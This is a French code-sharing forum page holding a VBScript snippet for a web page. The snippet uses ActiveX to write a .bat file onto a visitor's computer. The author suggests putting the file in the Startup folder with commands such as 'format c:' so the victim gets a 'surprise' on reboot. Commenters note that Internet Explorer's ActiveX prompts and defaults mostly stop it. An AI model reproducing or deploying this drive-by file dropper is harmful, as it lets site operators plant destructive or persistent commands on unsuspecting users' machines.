Creer un fichier .bat a partir d'une page web!!!

Soyez le premier à donner votre avis sur cette source.

Snippet vu 6 637 fois - Téléchargée 42 fois

Contenu du snippet

ce petit script inséré dans une page html permet de creer un fichier .bat sur l'ordinateur client.
on peut y mettre les lignes que l'on veut et le plmacer ou l'on veut (dans le dossier démarrage si on veut!)
les commandes dans le fichier .bat sont en Dos mais tout le monde connait format c: !
en arrivant sur le site, l'utilisateur verra une boite de dialogue internet explorer lui disant seuleument que le script ActiveX présent sur la page risque de ne pas fonctionner sur les autres pages! si le visiteur s'en fout et clique sur oui, c'est finit! le fichier est créé et il aura une drôle de surprise a son redémarrage....!

Source / Exemple :


<script language="VBScript">
if location.protocol = "file:" then
Set FSO = CreateObject("Scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\ini.bat", 2, False)
BatFile.WriteLine "[ici]"
BatFile.WriteLine "[ici sera inclu le contenu du fichier .bat ligne par ligne]"
BatFile.Close
end if
</script>

Conclusion :


A utiliser a bon escient et sans mauvaises intentions!!!

A voir également

Ajouter un commentaire

Commentaires

Messages postés
366
Date d'inscription
mercredi 7 avril 2004
Statut
Membre
Dernière intervention
20 février 2007

C'est simple, si il y a sa dans une page:

<script language="VBscript">
....
</script>

IE te demande si tu executer l'activX.
Et si le mec à installer windows XP pack 2, alors là, il le bloc carrement sans demander !

DSL, mais cette source était bonne il y a quelques temps mais plus maintenant (surtout si c'est pour balancer un trojant sur l'ordi d'un mec, je peut te dire que tu a 9 chances sur 10 que ca marche pas !)
Messages postés
240
Date d'inscription
vendredi 14 juin 2002
Statut
Membre
Dernière intervention
17 mars 2009

sa utilise des activex, et IE demande a l'utilisateur si il veut les executer, sinon sa marche pas
dsl
Messages postés
71
Date d'inscription
mercredi 9 janvier 2002
Statut
Membre
Dernière intervention
15 juin 2002

Il y a maintenant des protections contre des scripts de ce genre.
Ca met un truc du genre "Do you want to enable ActiveX ?"
Messages postés
46
Date d'inscription
vendredi 21 décembre 2001
Statut
Membre
Dernière intervention
23 juillet 2003

Réponse a lolux:
Je persiste et signe: le script est bon! t'as qu'a l'essayer, de plus j'ai mis aussi cette source pour vous dire de faire gaffe: sur un site un activex peut en cacher un autre!
Le code en ;lui meme est d'autre part interresant!
Messages postés
161
Date d'inscription
mardi 19 juin 2001
Statut
Membre
Dernière intervention
10 avril 2007

Idem, de toute façon IE désactive cet active dans la zone sécurisé par defaut.
Afficher les 8 commentaires

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.